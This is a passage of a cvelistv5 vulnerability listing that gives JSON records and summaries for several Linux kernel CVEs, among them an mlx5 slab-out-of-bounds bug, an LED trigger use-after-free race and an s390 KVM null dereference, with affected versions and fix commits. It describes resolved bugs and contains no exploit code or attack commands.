"versionStartIncluding": "5.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: Fix improper extts handling\n\nExtts events are disabled and enabled by the application ts2phc.\nHowever, in case where the driver is removed when the application is\nrunning, a specific extts event remains enabled and can cause a kernel\ncrash.\nAs a side effect, when the driver is reloaded and application is started\nagain, remaining extts event for the channel from a previous run will\nkeep firing and the message \"extts on unexpected channel\" might be\nprinted to the user.\n\nTo avoid that, extts events shall be disabled when PTP is released."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:57.391Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9f69b31ae9e25dec27ad31fbc64dd99af16ee3d3"
},
{
"url": "https://git.kernel.org/stable/c/00d3b4f54582d4e4a02cda5886bb336eeab268cc"
}
],
"title": "ice: Fix improper extts handling",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42139",
"datePublished": "2024-07-30T07:46:33.401Z",
"dateReserved": "2024-07-29T15:50:41.189Z",
"dateUpdated": "2025-05-04T09:23:57.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42162 (GCVE-0-2024-42162)
Vulnerability from cvelistv5
Published
2024-07-30 07:47
Modified
2025-05-21 09:13
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
gve: Account for stopped queues when reading NIC stats
We now account for the fact that the NIC might send us stats for a
subset of queues. Without this change, gve_get_ethtool_stats might make
an invalid access on the priv->stats_report->stats array.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.609Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/32675d828c8a392e20d5b42375ed112c407e4b62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af9bcf910b1f86244f39e15e701b2dc564b469a6"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42162",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:14:49.244034Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:07.261Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/google/gve/gve_ethtool.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "32675d828c8a392e20d5b42375ed112c407e4b62",
"status": "affected",
"version": "2f523dc34ac8c355609e9b847852bf25bbdb30bf",
"versionType": "git"
},
{
"lessThan": "af9bcf910b1f86244f39e15e701b2dc564b469a6",
"status": "affected",
"version": "2f523dc34ac8c355609e9b847852bf25bbdb30bf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/google/gve/gve_ethtool.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngve: Account for stopped queues when reading NIC stats\n\nWe now account for the fact that the NIC might send us stats for a\nsubset of queues. Without this change, gve_get_ethtool_stats might make\nan invalid access on the priv-\u003estats_report-\u003estats array."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:13:02.476Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/32675d828c8a392e20d5b42375ed112c407e4b62"
},
{
"url": "https://git.kernel.org/stable/c/af9bcf910b1f86244f39e15e701b2dc564b469a6"
}
],
"title": "gve: Account for stopped queues when reading NIC stats",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42162",
"datePublished": "2024-07-30T07:47:04.050Z",
"dateReserved": "2024-07-29T15:50:41.197Z",
"dateUpdated": "2025-05-21T09:13:02.476Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42158 (GCVE-0-2024-42158)
Vulnerability from cvelistv5
Published
2024-07-30 07:47
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
s390/pkey: Use kfree_sensitive() to fix Coccinelle warnings
Replace memzero_explicit() and kfree() with kfree_sensitive() to fix
warnings reported by Coccinelle:
WARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1506)
WARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1643)
WARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1770)
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.078Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62151a0acde90823bdfa991d598c85cf4b1d387d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/22e6824622e8a8889df0f8fc4ed5aea0e702a694"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42158",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:15:02.030879Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:33.882Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/pkey_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "62151a0acde90823bdfa991d598c85cf4b1d387d",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
},
{
"lessThan": "22e6824622e8a8889df0f8fc4ed5aea0e702a694",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/pkey_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/pkey: Use kfree_sensitive() to fix Coccinelle warnings\n\nReplace memzero_explicit() and kfree() with kfree_sensitive() to fix\nwarnings reported by Coccinelle:\n\nWARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1506)\nWARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1643)\nWARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1770)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:22.974Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/62151a0acde90823bdfa991d598c85cf4b1d387d"
},
{
"url": "https://git.kernel.org/stable/c/22e6824622e8a8889df0f8fc4ed5aea0e702a694"
}
],
"title": "s390/pkey: Use kfree_sensitive() to fix Coccinelle warnings",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42158",
"datePublished": "2024-07-30T07:47:00.343Z",
"dateReserved": "2024-07-29T15:50:41.195Z",
"dateUpdated": "2025-05-04T09:24:22.974Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48907 (GCVE-0-2022-48907)
Vulnerability from cvelistv5
Published
2024-08-22 01:30
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
auxdisplay: lcd2s: Fix memory leak in ->remove()
Once allocated the struct lcd2s_data is never freed.
Fix the memory leak by switching to devm_kzalloc().
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48907",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:14.050741Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:02.323Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/auxdisplay/lcd2s.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5d53cd33f4253aa4cf02bf7e670b3c6a99674351",
"status": "affected",
"version": "8c9108d014c5bd0f0da2e3544eb45dc56a6da92b",
"versionType": "git"
},
{
"lessThan": "3585ed5f9b11a6094dd991d76a1541e5d03b986a",
"status": "affected",
"version": "8c9108d014c5bd0f0da2e3544eb45dc56a6da92b",
"versionType": "git"
},
{
"lessThan": "898c0a15425a5bcaa8d44bd436eae5afd2483796",
"status": "affected",
"version": "8c9108d014c5bd0f0da2e3544eb45dc56a6da92b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/auxdisplay/lcd2s.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.11"
},
{
"lessThan": "5.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nauxdisplay: lcd2s: Fix memory leak in -\u003eremove()\n\nOnce allocated the struct lcd2s_data is never freed.\nFix the memory leak by switching to devm_kzalloc()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:52.305Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5d53cd33f4253aa4cf02bf7e670b3c6a99674351"
},
{
"url": "https://git.kernel.org/stable/c/3585ed5f9b11a6094dd991d76a1541e5d03b986a"
},
{
"url": "https://git.kernel.org/stable/c/898c0a15425a5bcaa8d44bd436eae5afd2483796"
}
],
"title": "auxdisplay: lcd2s: Fix memory leak in -\u003eremove()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48907",
"datePublished": "2024-08-22T01:30:45.176Z",
"dateReserved": "2024-08-21T06:06:23.292Z",
"dateUpdated": "2025-05-04T08:25:52.305Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48932 (GCVE-0-2022-48932)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: DR, Fix slab-out-of-bounds in mlx5_cmd_dr_create_fte
When adding a rule with 32 destinations, we hit the following out-of-band
access issue:
BUG: KASAN: slab-out-of-bounds in mlx5_cmd_dr_create_fte+0x18ee/0x1e70
This patch fixes the issue by both increasing the allocated buffers to
accommodate for the needed actions and by checking the number of actions
to prevent this issue when a rule with too many actions is provided.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48932",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:46.595523Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:09.982Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/steering/fs_dr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4ad319cdfbe555b4ff67bc608736c46a6930c848",
"status": "affected",
"version": "1ffd498901c1134a7cbecf5409e12c064c39cef9",
"versionType": "git"
},
{
"lessThan": "0aec12d97b2036af0946e3d582144739860ac07b",
"status": "affected",
"version": "1ffd498901c1134a7cbecf5409e12c064c39cef9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/steering/fs_dr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: DR, Fix slab-out-of-bounds in mlx5_cmd_dr_create_fte\n\nWhen adding a rule with 32 destinations, we hit the following out-of-band\naccess issue:\n\n BUG: KASAN: slab-out-of-bounds in mlx5_cmd_dr_create_fte+0x18ee/0x1e70\n\nThis patch fixes the issue by both increasing the allocated buffers to\naccommodate for the needed actions and by checking the number of actions\nto prevent this issue when a rule with too many actions is provided."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:21.081Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4ad319cdfbe555b4ff67bc608736c46a6930c848"
},
{
"url": "https://git.kernel.org/stable/c/0aec12d97b2036af0946e3d582144739860ac07b"
}
],
"title": "net/mlx5: DR, Fix slab-out-of-bounds in mlx5_cmd_dr_create_fte",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48932",
"datePublished": "2024-08-22T03:31:25.989Z",
"dateReserved": "2024-08-21T06:06:23.299Z",
"dateUpdated": "2025-05-04T08:26:21.081Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43830 (GCVE-0-2024-43830)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
leds: trigger: Unregister sysfs attributes before calling deactivate()
Triggers which have trigger specific sysfs attributes typically store
related data in trigger-data allocated by the activate() callback and
freed by the deactivate() callback.
Calling device_remove_groups() after calling deactivate() leaves a window
where the sysfs attributes show/store functions could be called after
deactivation and then operate on the just freed trigger-data.
Move the device_remove_groups() call to before deactivate() to close
this race window.
This also makes the deactivation path properly do things in reverse order
of the activation path which calls the activate() callback before calling
device_add_groups().
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a7e7a3156300a7e1982b03cc9cb8fb0c86434c49 Version: a7e7a3156300a7e1982b03cc9cb8fb0c86434c49 Version: a7e7a3156300a7e1982b03cc9cb8fb0c86434c49 Version: a7e7a3156300a7e1982b03cc9cb8fb0c86434c49 Version: a7e7a3156300a7e1982b03cc9cb8fb0c86434c49 Version: a7e7a3156300a7e1982b03cc9cb8fb0c86434c49 Version: a7e7a3156300a7e1982b03cc9cb8fb0c86434c49 Version: a7e7a3156300a7e1982b03cc9cb8fb0c86434c49 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43830",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:08:31.513833Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:23.792Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/leds/led-triggers.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c3b7a650c8717aa89df318364609c86cbc040156",
"status": "affected",
"version": "a7e7a3156300a7e1982b03cc9cb8fb0c86434c49",
"versionType": "git"
},
{
"lessThan": "d1415125b701ef13370e2761f691ec632a5eb93a",
"status": "affected",
"version": "a7e7a3156300a7e1982b03cc9cb8fb0c86434c49",
"versionType": "git"
},
{
"lessThan": "09c1583f0e10c918855d6e7540a79461a353e5d6",
"status": "affected",
"version": "a7e7a3156300a7e1982b03cc9cb8fb0c86434c49",
"versionType": "git"
},
{
"lessThan": "3fb6a9d67cfd812a547ac73ec02e1077c26c640d",
"status": "affected",
"version": "a7e7a3156300a7e1982b03cc9cb8fb0c86434c49",
"versionType": "git"
},
{
"lessThan": "734ba6437e80dfc780e9ee9d95f912392d12b5ea",
"status": "affected",
"version": "a7e7a3156300a7e1982b03cc9cb8fb0c86434c49",
"versionType": "git"
},
{
"lessThan": "cb8aa9d2a4c8a15d6a43ccf901ef3d094aa60374",
"status": "affected",
"version": "a7e7a3156300a7e1982b03cc9cb8fb0c86434c49",
"versionType": "git"
},
{
"lessThan": "0788a6f3523d3686a9eed5ea1e6fcce6841277b2",
"status": "affected",
"version": "a7e7a3156300a7e1982b03cc9cb8fb0c86434c49",
"versionType": "git"
},
{
"lessThan": "c0dc9adf9474ecb7106e60e5472577375aedaed3",
"status": "affected",
"version": "a7e7a3156300a7e1982b03cc9cb8fb0c86434c49",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/leds/led-triggers.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nleds: trigger: Unregister sysfs attributes before calling deactivate()\n\nTriggers which have trigger specific sysfs attributes typically store\nrelated data in trigger-data allocated by the activate() callback and\nfreed by the deactivate() callback.\n\nCalling device_remove_groups() after calling deactivate() leaves a window\nwhere the sysfs attributes show/store functions could be called after\ndeactivation and then operate on the just freed trigger-data.\n\nMove the device_remove_groups() call to before deactivate() to close\nthis race window.\n\nThis also makes the deactivation path properly do things in reverse order\nof the activation path which calls the activate() callback before calling\ndevice_add_groups()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:12.343Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c3b7a650c8717aa89df318364609c86cbc040156"
},
{
"url": "https://git.kernel.org/stable/c/d1415125b701ef13370e2761f691ec632a5eb93a"
},
{
"url": "https://git.kernel.org/stable/c/09c1583f0e10c918855d6e7540a79461a353e5d6"
},
{
"url": "https://git.kernel.org/stable/c/3fb6a9d67cfd812a547ac73ec02e1077c26c640d"
},
{
"url": "https://git.kernel.org/stable/c/734ba6437e80dfc780e9ee9d95f912392d12b5ea"
},
{
"url": "https://git.kernel.org/stable/c/cb8aa9d2a4c8a15d6a43ccf901ef3d094aa60374"
},
{
"url": "https://git.kernel.org/stable/c/0788a6f3523d3686a9eed5ea1e6fcce6841277b2"
},
{
"url": "https://git.kernel.org/stable/c/c0dc9adf9474ecb7106e60e5472577375aedaed3"
}
],
"title": "leds: trigger: Unregister sysfs attributes before calling deactivate()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43830",
"datePublished": "2024-08-17T09:21:48.946Z",
"dateReserved": "2024-08-17T09:11:59.273Z",
"dateUpdated": "2025-05-04T09:27:12.343Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43819 (GCVE-0-2024-43819)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
kvm: s390: Reject memory region operations for ucontrol VMs
This change rejects the KVM_SET_USER_MEMORY_REGION and
KVM_SET_USER_MEMORY_REGION2 ioctls when called on a ucontrol VM.
This is necessary since ucontrol VMs have kvm->arch.gmap set to 0 and
would thus result in a null pointer dereference further in.
Memory management needs to be performed in userspace and using the
ioctls KVM_S390_UCAS_MAP and KVM_S390_UCAS_UNMAP.
Also improve s390 specific documentation for KVM_SET_USER_MEMORY_REGION
and KVM_SET_USER_MEMORY_REGION2.
[frankja@linux.ibm.com: commit message spelling fix, subject prefix fix]
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43819",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:06.730085Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:25.193Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"Documentation/virt/kvm/api.rst",
"arch/s390/kvm/kvm-s390.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "49c9945c054df4c22008e2bf87ca74d3e2507aa6",
"status": "affected",
"version": "27e0393f15fc8bc855c6a888387ff5ffd2181089",
"versionType": "git"
},
{
"lessThan": "7816e58967d0e6cadce05c8540b47ed027dc2499",
"status": "affected",
